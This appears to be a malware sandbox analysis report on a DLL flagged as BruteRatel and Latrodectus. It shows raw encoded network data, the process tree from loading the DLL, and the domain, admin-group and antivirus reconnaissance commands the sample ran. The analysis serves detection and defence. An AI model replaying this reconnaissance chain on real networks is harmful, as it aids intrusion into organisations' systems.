                                                                  2024-12-02 17:47:05 UTC339INData Raw: 31 34 63 0d 0a 4f 43 79 62 51 73 53 32 30 59 70 69 61 78 6a 52 67 57 4c 6f 67 33 64 4d 50 45 76 51 42 43 6a 43 5a 2f 65 36 74 69 2f 4f 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 73 4c 30 49 74 66 5a 4f 4f 68 6c 6b 72 44 72 47 2b 73 75 30 4f 73 35 4f 73 6f 63 39 52 35 43 4e 53 46 47 4a 4a 6f 2f 36 61 56 44 46 73 64 55 46 50 51 56 48 2b 70 59 43 4f 52 6e 33 45 39 6a 30 66 4a 5a 30 4b 34 71 38 38 32 67 32 36 2b 76 37 62 52 69 45 6d 73 56 58 63 49 79 2f 4b 45 38 45 78 42 75 79 4d 4b 52 6f 58 61 72 50 45 66 44 30 6b 34 6f 52 50 37 31 4c 56 5a 78 70 50 69 30 45 31 4d 56 6c 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6b 4f 76 56 57 51 4a
                                                                  Data Ascii: 14cOCybQsS20YpiaxjRgWLog3dMPEvQBCjCZ/e6ti/OKRib7xuPoA21j4bUiz5sL0ItfZOOhlkrDrG+su0Os5Osoc9R5CNSFGJJo/6aVDFsdUFPQVH+pYCORn3E9j0fJZ0K4q882g26+v7bRiEmsVXcIy/KE8ExBuyMKRoXarPEfD0k4oRP71LVZxpPi0E1MVlEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbkOvVWQJ
                                                                  2024-12-02 17:47:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\loaddll64.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
                                                                  Imagebase:0x7ff722a90000
                                                                  File size:165'888 bytes
                                                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:2
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:3
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
                                                                  Imagebase:0x7ff7edbf0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000003.00000003.2319103261.000001CEB022C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:4
                                                                  Start time:12:42:56
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
                                                                  Imagebase:0x7ff7edbf0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000004.00000003.2421877879.0000027619B0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:6
                                                                  Start time:12:42:59
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
                                                                  Imagebase:0x7ff7edbf0000
                                                                  File size:71'680 bytes
                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2516556491.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2513239547.00000233A003B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:12:43:21
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff674740000
                                                                  File size:5'141'208 bytes
                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.4549377026.000000000977A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:10
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c ipconfig /all
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ipconfig /all
                                                                  Imagebase:0x7ff6067f0000
                                                                  File size:35'840 bytes
                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c systeminfo
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:12:44:50
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:systeminfo
                                                                  Imagebase:0x7ff67b490000
                                                                  File size:110'080 bytes
                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:12:44:51
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff6ef0c0000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c nltest /domain_trusts
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\nltest.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:nltest /domain_trusts
                                                                  Imagebase:0x7ff634410000
                                                                  File size:540'672 bytes
                                                                  MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c nltest /domain_trusts /all_trusts
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\nltest.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:nltest /domain_trusts /all_trusts
                                                                  Imagebase:0x7ff634410000
                                                                  File size:540'672 bytes
                                                                  MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net view /all /domain
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:12:44:52
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net view /all /domain
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:12:45:05
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net view /all
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:12:45:05
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:12:45:05
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net view /all
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:29
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net group "Domain Admins" /domain
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net group "Domain Admins" /domain
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net1.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                  Imagebase:0x7ff69b7c0000
                                                                  File size:183'808 bytes
                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                  Imagebase:0x7ff6ea700000
                                                                  File size:576'000 bytes
                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c net config workstation
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:net config workstation
                                                                  Imagebase:0x7ff7e86c0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:12:45:18
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\net1.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\net1 config workstation
                                                                  Imagebase:0x7ff69b7c0000
                                                                  File size:183'808 bytes
                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:40
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:41
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                  Imagebase:0x7ff6ea700000
                                                                  File size:576'000 bytes
                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:42
                                                                  Start time:12:45:19
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\findstr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:findstr /V /B /C:displayName
                                                                  Imagebase:0x7ff7d57d0000
                                                                  File size:36'352 bytes
                                                                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:43
                                                                  Start time:12:45:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:/c whoami /groups
                                                                  Imagebase:0x7ff6b4ba0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:44
                                                                  Start time:12:45:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:45
                                                                  Start time:12:45:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\whoami.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:whoami /groups
                                                                  Imagebase:0x7ff693020000
                                                                  File size:73'728 bytes
                                                                  MD5 hash:A4A6924F3EAF97981323703D38FD99C4
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:2.1%
                                                                    Dynamic/Decrypted Code Coverage:79.7%
                                                                    Signature Coverage:15.3%
                                                                    Total number of Nodes:701
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 54420 7ff8a8d02d25 54428 7ff8a8d966a0 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 54420->54428 53832 1ceafc77bf0 53833 1ceafc77c06 53832->53833 53848 1ceafc72930 53833->53848 53835 1ceafc77c24 53987 1ceafc78ed0 53835->53987 53837 1ceafc77d64 54020 1ceafc77f70 53837->54020 53839 1ceafc77d8c 54161 1ceafc94d00 GetUserNameW GetComputerNameExW 53839->54161 53841 1ceafc77f54 53842 1ceafc77da4 53842->53841 54193 1ceafca4740 53842->54193 53845 1ceafc84700 RtlFreeHeap 53847 1ceafc77e3b 53845->53847 53847->53841 53847->53845 54197 1ceafc83d90 9 API calls 53847->54197 54198 1ceafc78bc0 53847->54198 54247 1ceafc7ffe0 53848->54247 53854 1ceafc7f5f5 53854->53835 53855 1ceafc72943 53855->53854 54319 1ceafc7cce0 53855->54319 53858 1ceafc7cce0 LdrGetProcedureAddress 53859 1ceafc7ee2b 53858->53859 53860 1ceafc7cce0 LdrGetProcedureAddress 53859->53860 53861 1ceafc7ee54 53860->53861 53862 1ceafc7cce0 LdrGetProcedureAddress 53861->53862 53863 1ceafc7ee73 53862->53863 53864 1ceafc7cce0 LdrGetProcedureAddress 53863->53864 53865 1ceafc7ee92 53864->53865 53866 1ceafc7cce0 LdrGetProcedureAddress 53865->53866 53867 1ceafc7eeb1 53866->53867 53868 1ceafc7cce0 LdrGetProcedureAddress 53867->53868 53869 1ceafc7eed0 53868->53869 53870 1ceafc7cce0 LdrGetProcedureAddress 53869->53870 53871 1ceafc7eeef 53870->53871 53872 1ceafc7cce0 LdrGetProcedureAddress 53871->53872 53873 1ceafc7ef0e 53872->53873 53874 1ceafc7cce0 LdrGetProcedureAddress 53873->53874 53875 1ceafc7ef2d 53874->53875 53876 1ceafc7cce0 LdrGetProcedureAddress 53875->53876 53877 1ceafc7ef4c 53876->53877 53878 1ceafc7cce0 LdrGetProcedureAddress 53877->53878 53879 1ceafc7ef6b 53878->53879 53880 1ceafc7cce0 LdrGetProcedureAddress 53879->53880 53881 1ceafc7ef8a 53880->53881 53882 1ceafc7cce0 LdrGetProcedureAddress 53881->53882 53883 1ceafc7efa9 53882->53883 53884 1ceafc7cce0 LdrGetProcedureAddress 53883->53884 53885 1ceafc7efc8 53884->53885 53886 1ceafc7cce0 LdrGetProcedureAddress 53885->53886 53887 1ceafc7efe7 53886->53887 53888 1ceafc7cce0 LdrGetProcedureAddress 53887->53888 53889 1ceafc7f006 53888->53889 53890 1ceafc7cce0 